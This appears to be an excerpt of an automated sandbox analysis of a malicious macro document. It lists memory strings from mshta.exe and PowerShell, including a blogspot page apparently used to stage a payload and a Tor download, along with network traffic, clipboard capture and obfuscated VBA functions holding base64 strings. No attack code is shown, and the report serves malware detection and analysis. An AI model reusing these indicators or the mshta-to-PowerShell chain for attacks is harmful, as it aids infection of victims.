Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/unvisited-link-
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsZ
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsal
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/s
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/CO
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssM
Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssg
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443

Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations

Large array initialization: .cctor: array initializer size 12059

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function nQedtxArQgZ, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function PvrrqugmtK, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function aaBJQySxVnzo, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function hHvsmECZuS, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String MyORUMlOteZN
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String SoqzJEixPkDxnScc
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function piRACQzERc, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
